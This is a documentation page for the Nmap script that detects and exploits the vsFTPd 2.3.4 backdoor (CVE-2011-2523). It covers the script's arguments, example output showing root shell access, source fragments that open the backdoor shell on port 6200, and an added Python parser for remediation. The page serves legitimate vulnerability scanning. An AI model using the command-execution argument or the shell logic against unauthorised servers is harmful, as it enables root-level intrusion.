Nmap ftp-vsftpd-backdoor NSE Script


This page contains detailed information about how to use the ftp-vsftpd-backdoor NSE script. For a list of all NSE scripts, visit the Nmap NSE Library.

Script Overview


Script source code: https://github.com/nmap/nmap/tree/master/scripts/ftp-vsftpd-backdoor.nse
Script categories: exploit, intrusive, malware, vuln
Target service / protocol: ftp
Target network port(s): 21
List of CVEs: CVE-2011-2523

Script Description


The ftp-vsftpd-backdoor.nse script tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.

Ftp-vsftpd-backdoor NSE Script Arguments


This is a full list of arguments supported by the ftp-vsftpd-backdoor.nse script:

ftp-vsftpd-backdoor.cmd

Command to execute in shell (default is id).

vulns.short

If set, vulnerabilities will be output in short format, a single line consisting of the host's target name or IP, the state, and either the CVE ID or the title of the vulnerability. Does not affect XML output.

vulns.showall

If set, the library will show and report all registered vulnerabilities, including the NOT VULNERABLE ones. By default the library reports only the VULNERABLE entries: VULNERABLE, LIKELY VULNERABLE, VULNERABLE (DoS) and VULNERABLE (Exploitable). This argument affects the following functions:

  • vulns.Report.make_output(): the default output function for portrule/hostrule scripts.
  • vulns.make_output(): the default output function for postrule scripts.
  • vulns.format_vuln() and vulns.format_vuln_table().

To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..] syntax. For example:

nmap --script=ftp-vsftpd-backdoor --script-args ftp-vsftpd-backdoor.cmd=value,vulns.short=value <target>

Ftp-vsftpd-backdoor NSE Script Example Usage


Here's an example of how to use the ftp-vsftpd-backdoor.nse script:

nmap --script ftp-vsftpd-backdoor -p 21 <host>

Ftp-vsftpd-backdoor NSE Script Example Output


Here's a sample output from the ftp-vsftpd-backdoor.nse script:

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-vsftpd-backdoor:
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2011-2523  BID:48539
|     Description:
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       The backdoor was already triggered
|       Shell command: id
|       Results: uid=0(root) gid=0(root) groups=0(root)
|     References:
|       https://www.securityfocus.com/bid/48539
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb

Ftp-vsftpd-backdoor NSE Script Example XML Output


There is no sample XML output for this module. However, if you provide the -oX <file> option, Nmap will produce XML output and save it in the specified file.
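
When many hosts are scanned, the -oX file can be filtered for this script's results to build a remediation list. The following Python is an added example, not code from the Nmap project or from this page; the sample XML is constructed, and the code assumes the script element's output attribute carries the same "State:" line as the normal output shown above.

```python
import re
import xml.etree.ElementTree as ET

SCRIPT_ID = "ftp-vsftpd-backdoor"
# Prefixes of the states the vulns library reports by default (per this page).
ACTIONABLE = ("VULNERABLE", "LIKELY VULNERABLE")

# Constructed sample, not real scan data: a trimmed -oX document with three hosts.
# 192.0.2.20 has no <script> element (nothing is reported without vulns.showall).
SAMPLE_XML = """<nmaprun scanner="nmap">
<host><address addr="192.0.2.10" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="21"><state state="open"/>
    <script id="ftp-vsftpd-backdoor" output="&#10;  VULNERABLE:&#10;  vsFTPd version 2.3.4 backdoor&#10;    State: VULNERABLE (Exploitable)&#10;    IDs:  CVE:CVE-2011-2523  BID:48539"/>
  </port></ports></host>
<host><address addr="192.0.2.20" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="21"><state state="open"/></port></ports></host>
<host><address addr="192.0.2.30" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="21"><state state="open"/>
    <script id="ftp-vsftpd-backdoor" output="&#10;  NOT VULNERABLE:&#10;  vsFTPd version 2.3.4 backdoor&#10;    State: NOT VULNERABLE"/>
  </port></ports></host>
</nmaprun>"""


def findings(xml_text):
    """Return (address, port, state) for each port where the script reported."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            for script in port.findall("script"):
                if script.get("id") != SCRIPT_ID:
                    continue
                # The output attribute holds the text report; pull its State line.
                m = re.search(r"State:\s*(.+)", script.get("output", ""))
                state = m.group(1).strip() if m else "UNKNOWN"
                results.append((addr, int(port.get("portid")), state))
    return results


def actionable(results):
    """Keep only findings whose state is one of the VULNERABLE variants."""
    return [r for r in results if r[2].startswith(ACTIONABLE)]


if __name__ == "__main__":
    for addr, port, state in actionable(findings(SAMPLE_XML)):
        print(f"{addr}:{port} {state} (CVE-2011-2523): replace vsFTPd 2.3.4")
```

Hosts scanned with vulns.showall appear in findings() with a NOT VULNERABLE state and are dropped by actionable().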

Author


  • Daniel Miller


Error Messages


The ftp-vsftpd-backdoor.nse script may fail with the following error messages. Check for the possible causes using the code snippets below, taken from the script source code. This can often help in identifying the root cause of the problem.

can't connect to tcp port 6200


Here is a relevant code snippet related to the "can't connect to tcp port 6200" error message:

  local socket = nmap.new_socket("tcp")
  socket:set_timeout(10000)

  local status, ret = socket:connect(host, 6200, "tcp")
  if not status then
    return finish_ftp(socket, false, "can't connect to tcp port 6200")
  end

  status, ret = socket:send(CMD_SHELL_ID.."\n")
  if not status then
    return finish_ftp(socket, false, "failed to send shell command")

failed to send shell command


Here is a relevant code snippet related to the "failed to send shell command" error message:

    return finish_ftp(socket, false, "can't connect to tcp port 6200")
  end

  status, ret = socket:send(CMD_SHELL_ID.."\n")
  if not status then
    return finish_ftp(socket, false, "failed to send shell command")
  end

  status, ret = socket:receive_lines(1)
  if not status then
    return finish_ftp(socket, false,

failed to read shell command results: %s


Here is a relevant code snippet related to the "failed to read shell command results: %s" error message:

  end

  status, ret = socket:receive_lines(1)
  if not status then
    return finish_ftp(socket, false,
      string.format("failed to read shell command results: %s",
      ret))
  end

  if not ret:match("uid=") then
    return finish_ftp(socket, false, "service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE")

service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE


Here is a relevant code snippet related to the "service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE" error message:

      string.format("failed to read shell command results: %s",
      ret))
  end

  if not ret:match("uid=") then
    return finish_ftp(socket, false, "service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE")
  end

  vuln.state = vulns.STATE.EXPLOIT
  table.insert(vuln.exploit_results,
    string.format("Shell command: %s", CMD_SHELL_ID))

failed to send privilege escalation command: %s


Here is a relevant code snippet related to the "failed to send privilege escalation command: %s" error message:

    return nil
  end

  status, ret = sock:send(CMD_FTP .. "\r\n")
  if not status then
    stdnse.debug1("failed to send privilege escalation command: %s", ret)
    return nil
  end

  stdnse.sleep(1)
  -- check if vsFTPd was backdoored

Version


This page has been created based on Nmap version 7.92.
